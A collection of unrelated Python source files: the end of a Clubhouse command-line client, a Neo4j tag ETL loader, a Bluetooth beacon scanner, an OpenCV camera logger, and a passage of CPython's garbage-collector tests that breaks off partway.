token = channel_info['token']
RTC.joinChannel(token, channel_name, "", int(user_id))
else:
print("[!] Agora SDK is not installed.")
print(" You may not speak or listen to the conversation.")
# Activate pinging
client.active_ping(channel_name)
_ping_func = _ping_keep_alive(client, channel_name)
_wait_func = None
# Add raise_hands key bindings for speaker permission
# Sorry for the bad quality
if not channel_speaker_permission:
if sys.platform == "darwin": # OSX
_hotkey = "9"
elif sys.platform == "win32": # Windows
_hotkey = "ctrl+shift+h"
print(f"[*] Press [{_hotkey}] to raise your hands for the speaker permission.")
keyboard.add_hotkey(
_hotkey,
_request_speaker_permission,
args=(client, channel_name, user_id)
)
input("[*] Press [Enter] to quit conversation.\n")
keyboard.unhook_all()
# Safely leave the channel upon quitting the channel.
if _ping_func:
_ping_func.set()
if _wait_func:
_wait_func.set()
if RTC:
RTC.leaveChannel()
client.leave_channel(channel_name)
def user_authentication(client):
""" (Clubhouse) -> NoneType
Just for authenticating the user.
"""
result = None
while True:
user_phone_number = input("[.] Please enter your phone number. (+818043217654) > ")
result = client.start_phone_number_auth(user_phone_number)
if not result['success']:
print(f"[-] Error occured during authentication. ({result['error_message']})")
continue
break
result = None
while True:
verification_code = input("[.] Please enter the SMS verification code (1234, 0000, ...) > ")
result = client.complete_phone_number_auth(user_phone_number, verification_code)
if not result['success']:
print(f"[-] Error occured during authentication. ({result['error_message']})")
continue
break
user_id = result['user_profile']['user_id']
user_token = result['auth_token']
user_device = client.HEADERS.get("CH-DeviceId")
write_config(user_id, user_token, user_device)
print("[.] Writing configuration file complete.")
if result['is_waitlisted']:
print("[!] You're still on the waitlist. Find your friends to get yourself in.")
return
# Authenticate user first and start doing something
client = Clubhouse(
user_id=user_id,
user_token=user_token,
user_device=user_device
)
if result['is_onboarding']:
process_onboarding(client)
return
def main():
"""
Initialize required configurations, start with some basic stuff.
"""
# Initialize configuration
client = None
user_config = read_config()
user_id = user_config.get('user_id')
user_token = user_config.get('user_token')
user_device = user_config.get('user_device')
# Check if user is authenticated
if user_id and user_token and user_device:
client = Clubhouse(
user_id=user_id,
user_token=user_token,
user_device=user_device
)
# Check if user is still on the waitlist
_check = client.check_waitlist_status()
if _check['is_waitlisted']:
print("[!] You're still on the waitlist. Find your friends to get yourself in.")
return
# Check if user has not signed up yet.
_check = client.me()
if not _check['user_profile'].get("username"):
process_onboarding(client)
chat_main(client)
else:
client = Clubhouse()
user_authentication(client)
main()
if __name__ == "__main__":
try:
main()
except Exception:
# Remove dump files on exit.
file_list = os.listdir(".")
for _file in file_list:
if _file.endswith(".dmp"):
os.remove(_file)
|
category_tag_etl.py | """CateogryTag ETL."""
import logging
import multiprocessing
from etl import ETL
from etl.helpers import ETLHelper
from files import JSONFile
from transactors import CSVTransactor
from transactors import Neo4jTransactor
class CategoryTagETL(ETL):
"""Category Tag ETL."""
logger = logging.getLogger(__name__)
# Query templates which take params and will be processed later
tag_query_template = """
USING PERIODIC COMMIT %s
LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
MERGE (e:CategoryTag {primaryKey: row.tag})
ON CREATE SET e.tagName = row.tag,
e.tagDefinition = row.definition
"""
def __init__(self, config):
"""Initialise object."""
super().__init__()
self.data_type_config = config
def _load_and_process_data(self):
thread_pool = []
for sub_type in self.data_type_config.get_sub_type_objects():
process = multiprocessing.Process(target=self._process_sub_type, args=(sub_type,))
process.start()
thread_pool.append(process)
ETL.wait_for_threads(thread_pool)
def _process_sub_type(self, sub_type):
self.logger.info("Loading HTP Tag Data: %s", sub_type.get_data_provider())
filepath = sub_type.get_filepath()
data = JSONFile().get_data(filepath)
self.logger.info("Finished Loading HTP Tag Data: %s", sub_type.get_data_provider())
if data is None:
self.logger.warning("No Data found for %s skipping", sub_type.get_data_provider())
return
ETLHelper.load_release_info(data, sub_type, self.logger)
commit_size = self.data_type_config.get_neo4j_commit_size()
# batch_size = self.data_type_config.get_neo4j_commit_size()
data_provider = sub_type.get_data_provider()
self.logger.info("subtype: " + data_provider)
query_template_list = [
[self.tag_query_template, commit_size,
"tag_data_" + sub_type.get_data_provider() + ".csv"]
]
generators = self.get_generators(data)
query_and_file_list = self.process_query_params(query_template_list)
CSVTransactor.save_file_static(generators, query_and_file_list)
Neo4jTransactor.execute_query_batch(query_and_file_list)
self.error_messages("CategoryTag-{}: ".format(sub_type.get_data_provider()))
def get_generators(self, data):
"""Create Generator."""
tag_maps = []
for tag in data['data']:
tag_object = {"tag": tag.get('Category'),
"name": tag.get('Category'),
"definition": tag.get('Definition')}
tag_maps.append(tag_object)
yield [tag_maps]
|
docker_beacon_scan.py | """
CONFIG
"""
TIME_SCAN = 5
NAME_FILE_BEACON = "json_beacon_scan.json"
"""
Clases
"""
# https://github.com/bowdentheo/BLE-Beacon-Scanner
class Beacon_Obj(object):
mac = str()
rssi = int()
uuid = str()
tx_power = int()
major = int()
minor = int()
tipo = str()
empresa = str()
def __init__(self, mac: str, rssi: int, uuid: str, tx: int, maj: int, min: int, tip: str, company: str):
self.mac = mac
self.rssi = rssi
self.uuid = uuid
self.tx_power = tx
self.major = maj
self.minor = min
self.tipo = tip
self.empresa = company
def getJson(self):
return self.__dict__
class beacontools:
import sys
import struct
import bluetooth._bluetooth as bluez
from multiprocessing import Process, Queue
import time
OGF_LE_CTL = 0x08
OCF_LE_SET_SCAN_ENABLE = 0x000C
BEACONs_SCANNED = dict()
def __init__(self, dev_id, time_use):
self.proc = self.Process(target=self.__continue_process)
self.time_use = time_use
try:
self.sock = self.bluez.hci_open_dev(dev_id)
print("\n *** Looking for BLE Beacons ***\n")
except:
self.sock = None
print("Error accessing bluetooth")
self.queue = self.Queue()
def hci_enable_le_scan(self):
if self.sock is not None:
self.hci_toggle_le_scan(0x01)
def hci_disable_le_scan(self):
if self.sock is not None:
self.hci_toggle_le_scan(0x00)
def hci_toggle_le_scan(self, enable):
if self.sock is not None:
cmd_pkt = self.struct.pack("<BB", enable, 0x00)
self.bluez.hci_send_cmd(self.sock, self.OGF_LE_CTL, self.OCF_LE_SET_SCAN_ENABLE, cmd_pkt)
def packetToString(self, packet):
"""
Returns the string representation of a raw HCI packet.
"""
if self.sys.version_info > (3, 0):
return ''.join('%02x' % self.struct.unpack("B", bytes([x]))[0] for x in packet)
else:
return ''.join('%02x' % self.struct.unpack("B", x)[0] for x in packet)
def parse_events(self, loop_count=100):
global prefix
if self.sock is not None:
# old_filter = self.sock.getsockopt( self.bluez.SOL_HCI, self.bluez.HCI_FILTER, 14)
flt = self.bluez.hci_filter_new()
self.bluez.hci_filter_all_events(flt)
self.bluez.hci_filter_set_ptype(flt, self.bluez.HCI_EVENT_PKT)
self.sock.setsockopt(self.bluez.SOL_HCI, self.bluez.HCI_FILTER, flt)
results = []
for i in range(0, loop_count):
packet = self.sock.recv(255)
# ptype, event, plen = self.struct.unpack("BBB", packet[:3])
packetOffset = 0
dataString = self.packetToString(packet)
"""
If the bluetooth device is an beacon then show the beacon.
"""
# print (dataString)
if (dataString[34:42] == '0303aafe') and (dataString[44:50] == '16AAFE'):
"""
Selects parts of the bluetooth packets.
"""
broadcastType = dataString[50:52]
if broadcastType == '00':
type = "Eddystone UID"
namespace = dataString[54:74].upper()
instance = dataString[74:86].upper()
resultsArray = [
{"type": type, "namespace": namespace, "instance": instance}]
return resultsArray
elif broadcastType == '10':
type = "Eddystone URL"
urlprefix = dataString[54:56]
if urlprefix == '00':
prefix = 'http://www.'
elif urlprefix == '01':
prefix = 'https://www.'
elif urlprefix == '02':
prefix = 'http://'
elif urlprefix == '03':
prefix = 'https://'
hexUrl = dataString[56:][:-2]
if self.sys.version_info[0] == 3:
url = prefix + bytes.fromhex(hexUrl).decode('utf-8')
rssi, = self.struct.unpack("b", bytes([packet[packetOffset - 1]]))
else:
url = prefix + hexUrl.decode("hex")
rssi, = self.struct.unpack("b", packet[packetOffset - 1])
resultsArray = [{"type": type, "url": url}]
return resultsArray
elif broadcastType == '20':
type = "Eddystone TLM"
resultsArray = [{"type": type}]
return resultsArray
elif broadcastType == '30':
type = "Eddystone EID"
resultsArray = [{"type": type}]
return resultsArray
elif broadcastType == '40':
type = "Eddystone RESERVED"
resultsArray = [{"type": type}]
return resultsArray
if dataString[38:46] == '4c000215':
"""
Selects parts of the bluetooth packets.
"""
type = "iBeacon"
uuid = dataString[46:54] + "-" + dataString[54:58] + "-" + dataString[58:62] + "-" + dataString[
62:66] + "-" + dataString[
66:78]
major = dataString[78:82]
minor = dataString[82:86]
majorVal = int("".join(major.split()[::-1]), 16)
minorVal = int("".join(minor.split()[::-1]), 16)
"""
Organises Mac Address to display properly
"""
scrambledAddress = dataString[14:26]
fixStructure = iter(
"".join(reversed([scrambledAddress[i:i + 2] for i in range(0, len(scrambledAddress), 2)])))
macAddress = ':'.join(a + b for a, b in zip(fixStructure, fixStructure))
if self.sys.version_info[0] == 3:
rssi, = self.struct.unpack("b", bytes([packet[packetOffset - 1]]))
else:
rssi, = self.struct.unpack("b", packet[packetOffset - 1])
resultsArray = [{"type": type, "uuid": uuid, "major": majorVal, "minor": minorVal, "rssi": rssi,
"macAddress": macAddress}]
for item in resultsArray:
beacon = Beacon_Obj(item['macAddress'], item['rssi'], item['uuid'], 0, item['major'],
item['minor'], item['type'], item['uuid'][0:8])
self.BEACONs_SCANNED[beacon.uuid] = beacon
return resultsArray
return results
return []
def __continue_process(self):
self.time_sleep = self.time.time()
while True:
self.parse_events(10)
self.time.sleep(0.25)
if (int(abs(self.time_sleep - self.time.time()) * 100) / 100) >= self.time_use:
self.queue.put(self.BEACONs_SCANNED)
self.BEACONs_SCANNED = dict()
self.time_sleep = self.time.time()
def start_continue_process(self):
self.hci_enable_le_scan()
self.proc.start()
def detener_continue_process(self):
self.proc.terminate()
self.proc.join()
def get_beacons(self):
if not self.queue.empty():
return self.queue.get()
else:
return dict()
"""
Proceso
"""
class Process_beacon_scan(object):
def __init__(self):
self.scan_beacon = beacontools(0, TIME_SCAN)
def main_beacon_scan(self):
import json
import time
self.scan_beacon.start_continue_process()
FOLDER = "/home/Beacon/"
while True:
BEACONS = self.scan_beacon.get_beacons()
OBJ = dict()
for key, beacon_class in BEACONS.items():
OBJ[key] = beacon_class.getJson()
print(beacon_class.getJson())
print("Escaneando")
print(OBJ)
#with open(FOLDER + NAME_FILE_BEACON, 'w') as outfile:
# json.dump(OBJ, outfile)
time.sleep(TIME_SCAN)
scan_beacon.detener_continue_process()
"""
Ejecutor unico para que solo se ejecute en este archivo
"""
if __name__ == '__main__':
Process_beacon_scan().main_beacon_scan()
|
opencv.py | """
Log video stream provided by OpenCV camera
"""
import cv2
from threading import Thread
class LogOpenCVCamera:
def __init__(self, config, bus):
self.input_thread = Thread(target=self.run_input, daemon=True)
self.bus = bus
bus.register('raw')
port = config.get('port', 0)
self.cap = cv2.VideoCapture(port)
self.sleep = config.get('sleep')
def start(self):
self.input_thread.start()
def join(self, timeout=None):
self.input_thread.join(timeout=timeout)
def run_input(self):
while self.bus.is_alive():
# Capture frame-by-frame
ret, frame = self.cap.read()
if ret:
retval, data = cv2.imencode('*.jpeg', frame)
if len(data) > 0:
self.bus.publish('raw', data.tobytes())
if self.sleep is not None:
self.bus.sleep(self.sleep)
self.cap.release()
def request_stop(self):
self.bus.shutdown()
# vim: expandtab sw=4 ts=4
|
test_gc.py | import unittest
from test.support import (verbose, refcount_test, run_unittest,
strip_python_stderr, cpython_only, start_threads)
from test.script_helper import assert_python_ok, make_script, temp_dir
import sys
import time
import gc
import weakref
try:
import threading
except ImportError:
threading = None
try:
from _testcapi import with_tp_del
except ImportError:
def with_tp_del(cls):
class C(object):
def __new__(cls, *args, **kwargs):
raise TypeError('requires _testcapi.with_tp_del')
return C
### Support code
###############################################################################
# Bug 1055820 has several tests of longstanding bugs involving weakrefs and
# cyclic gc.
# An instance of C1055820 has a self-loop, so becomes cyclic trash when
# unreachable.
class C1055820(object):
def __init__(self, i):
self.i = i
self.loop = self
class GC_Detector(object):
# Create an instance I. Then gc hasn't happened again so long as
# I.gc_happened is false.
def __init__(self):
self.gc_happened = False
def it_happened(ignored):
self.gc_happened = True
# Create a piece of cyclic trash that triggers it_happened when
# gc collects it.
self.wr = weakref.ref(C1055820(666), it_happened)
@with_tp_del
class Uncollectable(object):
"""Create a reference cycle with multiple __del__ methods.
An object in a reference cycle will never have zero references,
and so must be garbage collected. If one or more objects in the
cycle have __del__ methods, the gc refuses to guess an order,
and leaves the cycle uncollected."""
def __init__(self, partner=None):
if partner is None:
self.partner = Uncollectable(partner=self)
else:
self.partner = partner
def __tp_del__(self):
pass
### Tests
###############################################################################
class GCTests(unittest.TestCase):
def test_list(self):
l = []
l.append(l)
gc.collect()
del l
self.assertEqual(gc.collect(), 1)
def test_dict(self):
d = {}
d[1] = d
gc.collect()
del d
self.assertEqual(gc.collect(), 1)
def test_tuple(self):
# since tuples are immutable we close the loop with a list
l = []
t = (l,)
l.append(t)
gc.collect()
del t
del l
self.assertEqual(gc.collect(), 2)
def test_class(self):
class A:
pass
A.a = A
gc.collect()
del A
self.assertNotEqual(gc.collect(), 0)
def test_newstyleclass(self):
class A(object):
pass
gc.collect()
del A
self.assertNotEqual(gc.collect(), 0)
def test_instance(self):
class A:
pass
a = A()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
def test_newinstance(self):
class A(object):
pass
a = A()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
class B(list):
pass
class C(B, A):
pass
a = C()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
del B, C
self.assertNotEqual(gc.collect(), 0)
A.a = A()
del A
self.assertNotEqual(gc.collect(), 0)
self.assertEqual(gc.collect(), 0)
def test_method(self):
# Tricky: self.__init__ is a bound method, it references the instance.
class A:
def __init__(self):
self.init = self.__init__
a = A()
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
@cpython_only
def test_legacy_finalizer(self):
# A() is uncollectable if it is part of a cycle, make sure it shows up
# in gc.garbage.
@with_tp_del
class A:
def __tp_del__(self): pass
class B:
pass
a = A()
a.a = a
id_a = id(a)
b = B()
b.b = b
gc.collect()
del a
del b
self.assertNotEqual(gc.collect(), 0)
for obj in gc.garbage:
if id(obj) == id_a:
del obj.a
break
else:
self.fail("didn't find obj in garbage (finalizer)")
gc.garbage.remove(obj)
@cpython_only
def test_legacy_finalizer_newclass(self):
# A() is uncollectable if it is part of a cycle, make sure it shows up
# in gc.garbage.
@with_tp_del
class A(object):
def __tp_del__(self): pass
class B(object):
pass
a = A()
a.a = a
id_a = id(a)
b = B()
b.b = b
gc.collect()
del a
del b
self.assertNotEqual(gc.collect(), 0)
for obj in gc.garbage:
if id(obj) == id_a:
del obj.a
break
else:
self.fail("didn't find obj in garbage (finalizer)")
gc.garbage.remove(obj)
def test_function(self):
# Tricky: f -> d -> f, code should call d.clear() after the exec to
# break the cycle.
d = {}
exec("def f(): pass\n", d)
gc.collect()
del d
self.assertEqual(gc.collect(), 2)
@refcount_test
def test_frame(self):
def f():
frame = sys._getframe()
gc.collect()
f()
self.assertEqual(gc.collect(), 1)
def test_saveall(self):
# Verify that cyclic garbage like lists show up in gc.garbage if the
# SAVEALL option is enabled.
# First make sure we don't save away other stuff that just happens to
# be waiting for collection.
gc.collect()
# if this fails, someone else created immortal trash
self.assertEqual(gc.garbage, [])
L = []
L.append(L)
id_L = id(L)
debug = gc.get_debug()
gc.set_debug(debug | gc.DEBUG_SAVEALL)
del L
gc.collect()
gc.set_debug(debug)
self.assertEqual(len(gc.garbage), 1)
obj = gc.garbage.pop()
self.assertEqual(id(obj), id_L)
def test_del(self):
# __del__ methods can trigger collection, make this to happen
thresholds = gc.get_threshold()
gc.enable()
gc.set_threshold(1)
class A:
def __del__(self):
dir(self)
a = A()
del a
gc.disable()
gc.set_threshold(*thresholds)
def test_del_newclass(self):
# __del__ methods can trigger collection, make this to happen
thresholds = gc.get_threshold()
gc.enable()
gc.set_threshold(1)
class A(object):
def __del__(self):
dir(self)
a = A()
del a
gc.disable()
gc.set_threshold(*thresholds)
# The following two tests are fragile:
# They precisely count the number of allocations,
# which is highly implementation-dependent.
# For example, disposed tuples are not freed, but reused.
# To minimize variations, though, we first store the get_count() results
# and check them at the end.
@refcount_test
def test_get_count(self):
gc.collect()
a, b, c = gc.get_count()
x = []
d, e, f = gc.get_count()
self.assertEqual((b, c), (0, 0))
self.assertEqual((e, f), (0, 0))
# This is less fragile than asserting that a equals 0.
self.assertLess(a, 5)
# Between the two calls to get_count(), at least one object was
# created (the list).
self.assertGreater(d, a)
@refcount_test
def test_collect_generations(self):
gc.collect()
# This object will "trickle" into generation N + 1 after
# each call to collect(N)
x = []
gc.collect(0)
# x is now in gen 1
a, b, c = gc.get_count()
gc.collect(1)
# x is now in gen 2
d, e, f = gc.get_count()
gc.collect(2)
# x is now in gen 3
g, h, i = gc.get_count()
# We don't check a, d, g since their exact values depends on
# internal implementation details of the interpreter.
self.assertEqual((b, c), (1, 0))
self.assertEqual((e, f), (0, 1))
self.assertEqual((h, i), (0, 0))
def test_trashcan(self):
class Ouch:
n = 0
def __del__(self):
Ouch.n = Ouch.n + 1
if Ouch.n % 17 == 0:
gc.collect()
# "trashcan" is a hack to prevent stack overflow when deallocating
# very deeply nested tuples etc. It works in part by abusing the
# type pointer and refcount fields, and that can yield horrible
# problems when gc tries to traverse the structures.
# If this test fails (as it does in 2.0, 2.1 and 2.2), it will
# most likely die via segfault.
# Note: In 2.3 the possibility for compiling without cyclic gc was
# removed, and that in turn allows the trashcan mechanism to work
# via much simpler means (e.g., it never abuses the type pointer or
# refcount fields anymore). Since it's much less likely to cause a
# problem now, the various constants in this expensive (we force a lot
# of full collections) test are cut back from the 2.2 version.
gc.enable()
N = 150
for count in range(2):
t = []
for i in range(N):
t = [t, Ouch()]
u = []
for i in range(N):
u = [u, Ouch()]
v = {}
for i in range(N):
v = {1: v, 2: Ouch()}
gc.disable()
@unittest.skipUnless(threading, "test meaningless on builds without threads")
def test_trashcan_threads(self):
# Issue #13992: trashcan mechanism should be thread-safe
NESTING = 60
N_THREADS = 2
def sleeper_gen():
"""A generator that releases the GIL when closed or dealloc'ed."""
try:
yield
finally:
time.sleep(0.000001)
class C(list):
# Appending to a list is atomic, which avoids the use of a lock.
inits = []
dels = []
def __init__(self, alist):
self[:] = alist
C.inits.append(None)
def __del__(self):
# This __del__ is called by subtype_dealloc().
C.dels.append(None)
# `g` will release the GIL when garbage-collected. This
# helps assert subtype_dealloc's behaviour when threads
# switch in the middle of it.
g = sleeper_gen()
next(g)
# Now that __del__ is finished, subtype_dealloc will proceed
# to call list_dealloc, which also uses the trashcan mechanism.
def make_nested():
"""Create a sufficiently nested container object so that the
trashcan mechanism is invoked when deallocating it."""
x = C([])
for i in range(NESTING):
x = [C([x])]
del x
def run_thread():
"""Exercise make_nested() in a loop."""
while not exit:
make_nested()
old_switchinterval = sys.getswitchinterval()
sys.setswitchinterval(1e-5)
try:
exit = []
threads = []
for i in range(N_THREADS):
t = threading.Thread(target=run_thread)
threads.append(t)
with start_threads(threads, lambda: exit.append(1)):
time.sleep(1.0)
finally:
sys.setswitchinterval(old_switchinterval)
gc.collect()
self.assertEqual(len(C.inits), len(C.dels))
def test_boom(self):
class Boom:
def __getattr__(self, someattribute):
del self.attr
raise AttributeError
a = Boom()
b = Boom()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
# a<->b are in a trash cycle now. Collection will invoke
# Boom.__getattr__ (to see whether a and b have __del__ methods), and
# __getattr__ deletes the internal "attr" attributes as a side effect.
# That causes the trash cycle to get reclaimed via refcounts falling to
# 0, thus mutating the trash graph as a side effect of merely asking
# whether __del__ exists. This used to (before 2.3b1) crash Python.
# Now __getattr__ isn't called.
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom2(self):
class Boom2:
def __init__(self):
self.x = 0
def __getattr__(self, someattribute):
self.x += 1
if self.x > 1:
del self.attr
raise AttributeError
a = Boom2()
b = Boom2()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
# Much like test_boom(), except that __getattr__ doesn't break the
# cycle until the second time gc checks for __del__. As of 2.3b1,
# there isn't a second time, so this simply cleans up the trash cycle.
# We expect a, b, a.__dict__ and b.__dict__ (4 objects) to get
# reclaimed this way.
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom_new(self):
# boom__new and boom2_new are exactly like boom and boom2, except use
# new-style classes.
class Boom_New(object):
def __getattr__(self, someattribute):
del self.attr
raise AttributeError
a = Boom_New()
b = Boom_New()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom2_new(self):
class Boom2_New(object):
def __init__(self):
self.x = 0
def __getattr__(self, someattribute):
self.x += 1
if self.x > 1:
del self.attr
raise AttributeError
a = Boom2_New()
b = Boom2_New()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_get_referents(self):
alist = [1, 3, 5]
got = gc.get_referents(alist)
got.sort()
self.assertEqual(got, alist)
atuple = tuple(alist)
got = gc.get_referents(atuple)
got.sort()
self.assertEqual(got, alist)
adict = {1: 3, 5: 7}
expected = [1, 3, 5, 7]
got = gc.get_referents(adict)
got.sort()
self.assertEqual(got, expected)
got = gc.get_referents([1, 2], {3: 4}, (0, 0, 0))
got.sort()
self.assertEqual(got, [0, 0] + list(range(5)))
self.assertEqual(gc.get_referents(1, 'a', 4j), [])
def test_is_tracked(self):
# Atomic built-in types are not tracked, user-defined objects and
# mutable containers are.
# NOTE: types with special optimizations (e.g. tuple) have tests
# in their own test files instead.
self.assertFalse(gc.is_tracked(None))
self.assertFalse(gc.is_tracked(1))
self.assertFalse(gc.is_tracked(1.0))
self.assertFalse(gc.is_tracked(1.0 + 5.0j))
self.assertFalse(gc.is_tracked(True))
self.assertFalse(gc.is_tracked(False))
self.assertFalse(gc.is_tracked(b"a"))
self.assertFalse(gc.is_tracked("a"))
self.assertFalse(gc.is_tracked(bytearray(b"a")))
self.assertFalse(gc.is_tracked(type))
self.assertFalse(gc.is_tracked(int))
self.assertFalse(gc.is_tracked(object))
self.assertFalse(gc.is_tracked(object()))
class UserClass:
pass
class UserInt(int):
pass
# Base class is object; no extra fields.
class UserClassSlots:
__slots__ = ()
# Base class is fixed size larger than object; no extra fields.
class UserFloatSlots(float):
__slots__ = ()
# Base class is variable size; no extra fields.
class UserIntSlots(int):
__slots__ = ()
self.assertTrue(gc.is_tracked(gc))
self.assertTrue(gc.is_tracked(UserClass))
self.assertTrue(gc.is_tracked(UserClass()))
self.assertTrue(gc.is_tracked(UserInt()))
self.assertTrue(gc.is_tracked([]))
self.assertTrue(gc.is_tracked(set()))
self.assertFalse(gc.is_tracked(UserClassSlots()))
self.assertFalse(gc.is_tracked(UserFloatSlots()))
self.assertFalse(gc.is_tracked(UserIntSlots()))
def test_bug1055820b(self):
# Corresponds to temp2b.py in the bug report.
ouch = []
def callback(ignored):
ouch[:] = [wr() for wr in WRs]
Cs = [C1055820(i) for i in range(2)]
WRs = [weakref.ref(c, callback) for c in Cs]
c = None
gc.collect()
self.assertEqual(len(ouch), 0)
# Make the two instances trash, and collect again. The bug was that
# the callback materialized a strong reference to an instance, but gc
# cleared the instance's dict anyway.
Cs = None
gc.collect()
self.assertEqual(len(ouch), 2) # else the callbacks didn't run
for x in ouch:
# If the callback resurrected one of these guys, the instance
# would be damaged, with an empty __dict__.
self.assertEqual(x, None)
def test_bug21435(self):
# This is a poor test - its only virtue is that it happened to
# segfault on Tim's Windows box before the patch for 21435 was
# applied. That's a nasty bug relying on specific pieces of cyclic
# trash appearing in exactly the right order in finalize_garbage()'s
# input list.
# But there's no reliable way to force that order from Python code,
# so over time chances are good this test won't really be testing much
# of anything anymore. Still, if it blows up, there's _some_
# problem ;-)
gc.collect()
class A:
pass
class B:
def __init__(self, x):
self.x = x
def __del__(self):
self.attr = None
def do_work():
a = A()
b = B(A())
a.attr = b
b.attr = a
do_work()
gc.collect() # this blows up (bad C pointer) when it fails
@cpython_only
def test_garbage_at_shutdown(self):
import subprocess
code = """if 1:
import gc
import _testcapi
@_testcapi.with_tp_del
class X:
def __init__(self, name):
self.name = name
def __repr__(self):
return "<X %%r>" %% self.name
def __tp_del__(self):
pass
x = X('first')
x.x = x
x.y = X('second')
del x
gc.set_debug(%s)
"""
def run_command(code):
p = subprocess.Popen([sys.executable, "-Wd", "-c", code],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
p.stdout.close()
p.stderr.close()
self.assertEqual(p.returncode, 0)
self.assertEqual(stdout.strip(), b"")
return strip_python_stderr(stderr)
stderr = run_command(code % "0")
self.assertIn(b"ResourceWarning: gc: 2 uncollectable objects at "
b"shutdown; use", stderr)
self.assertNotIn(b"<X 'first'>", stderr)
# With DEBUG_UNCOLLECTABLE, the garbage list gets printed
stderr = run_command(code % "gc.DEBUG_UNCOLLECTABLE")
self.assertIn(b"ResourceWarning: gc: 2 uncollectable objects at "
b"shutdown", stderr)
self.assertTrue(
(b"[<X 'first'>, <X 'second'>]" in stderr) or
(b"[<X 'second'>, <X 'first'>]" in stderr), stderr)
# With DEBUG_SAVEALL, no additional message should get printed
# (because gc.garbage also contains normally reclaimable cyclic
# references, and its elements get printed at runtime anyway).
stderr = run_command(code % "gc.DEBUG_SAVEALL")
self.assertNotIn(b"uncollectable objects at shutdown", stderr)
def test_gc_main_module_at_shutdown(self):
# Create a reference cycle through the __main__ module and check
# it gets collected at interpreter shutdown.
code = """if 1:
import weakref
class C:
def __del__(self):
print('__del__ called')
l = [C()]
l.append(l)
"""
rc, out, err = assert_python_ok('-c', code)
self.assertEqual(out.strip(), b'__del__ called')
def test_gc_ordinary_module_at_shutdown(self):
# Same as above, but with a non-__main__ module.
with temp_dir() as script_dir:
module = """if 1:
import weakref
class C:
def __del__(self):
print('__del__ called')
l = [C()]
l.append(l)
"""
code = """if 1:
import sys
sys.path.insert(0, %r)
import gctest
""" % (script_dir,)
make_script(script_dir, 'gctest', module)
rc, out, err = assert_python_ok('-c', code)
self.assertEqual(out.strip(), b'__del__ called')
def test_get_stats(self):
stats = gc.get_stats()
self.assertEqual(len(stats), 3)
for st in stats:
self.assertIsInstance(st, dict)
self.assertEqual(set(st),
{"collected", "collections", "uncollectable"})
self.assertGreaterEqual(st["collected"], 0)
self.assertGreaterEqual(st["collections"], 0)
self.assertGreaterEqual(st["uncollectable"], 0)
# Check that collection counts are incremented correctly
if gc.isenabled():
self.addCleanup(gc.enable)
gc.disable()
old = gc.get_stats()
gc.collect(0)
new = gc.get_stats()
self.assertEqual(new[0]["collections"], old[0]["collections"] + 1)
self.assertEqual(new[1]["collections"], old[1]["collections"])
self.assertEqual(new[2]["collections"], old[2]["collections"])
gc.collect(2)
new = gc.get_stats()
self.assertEqual(new[0]["collections"], old[0]["collections"] + 1)
self.assertEqual(new[1]["collections"], old[1]["collections"])
self.assertEqual(new[2]["collections"], old[2]["collections"] + 1)
class GCCallbackTests(unittest.TestCase):
def setUp(self):
# Save gc state and disable it.
self.enabled = gc.isenabled()
gc.disable()
self.debug = gc.get_debug()
gc.set_debug(0)
gc.callbacks.append(self.cb1)
gc.callbacks.append(self.cb2)
self.othergarbage = []
def tearDown(self):
# Restore gc state
del self.visit
gc.callbacks.remove(self.cb1)
gc.callbacks.remove(self.cb2)
gc.set_debug(self.debug)
if self.enabled:
gc.enable()
# destroy any uncollectables
gc.collect()
for obj in gc.garbage:
if isinstance(obj, Uncollectable):
obj.partner = None
del gc.garbage[:]
del self.othergarbage
gc.collect()
def preclean(self):
# Remove all fluff from the system. Invoke this function
# manually rather than through self.setUp() for maximum
# safety.
self.visit = []
gc.collect()
garbage, gc.garbage[:] = gc.garbage[:], []
self.othergarbage.append(garbage)
self.visit = []
def cb1(self, phase, info):
self.visit.append((1, phase, dict(info)))
def cb2(self, phase, info):
self.visit.append((2, phase, dict(info)))
if phase == "stop" and hasattr(self, "cleanup"):
# Clean Uncollectable from garbage
uc = [e for e in gc.garbage if isinstance(e, Uncollectable)]
gc.garbage[:] = [e for e in gc.garbage
if not isinstance(e, Uncollectable)]
for e in uc:
e.partner = None
def test_collect(self):
self.preclean()
gc.collect()
# Algorithmically verify the contents of self.visit
# because it is long and tortuous.
# Count the number of visits to each callback
n = [v[0] for v in self.visit]
n1 = [i for i in n if i == 1]
n2 = [i for i in n if i == 2]
self.assertEqual(n1, [1]*2)
self.assertEqual(n2, [2]*2)
# Count that we got the right number of start and stop callbacks.
n = [v[1] for v in self.visit]
n1 = [i for i in n if i == "start"]
n2 = [i for i in n if i == "stop"]
self.assertEqual(n1, ["start"]*2)
self.assertEqual(n2, ["stop"]*2)
# Check that we got the right info dict for all callbacks
for v in self.visit:
info = v[2]
self.assertTrue("generation" in info)
self.assertTrue("collected" in info)
self.assertTrue("uncollectable" in info)
def test_collect_generation(self):
self.preclean()
gc.collect(2)
for v in self.visit:
info = v[2]
self.assertEqual(info["generation"], 2)
@cpython_only
def test_collect_garbage(self):
self.preclean()
# Each of these cause four objects to be garbage: Two
# Uncolectables and their instance dicts.
Uncollectable()
Uncollectable()
C1055820(666)
gc.collect()
for v in self.visit:
if v[1] != "stop":
continue
info = v[2]
self.assertEqual(info["collected"], 2)
self.assertEqual(info["uncollectable"], 8)
# We should now have the Uncollectables in gc.garbage
self.assertEqual(len(gc.garbage), 4)
for e in gc.garbage:
self.assertIsInstance(e, Uncollectable)
# Now, let our callback handle the Uncollectable instances
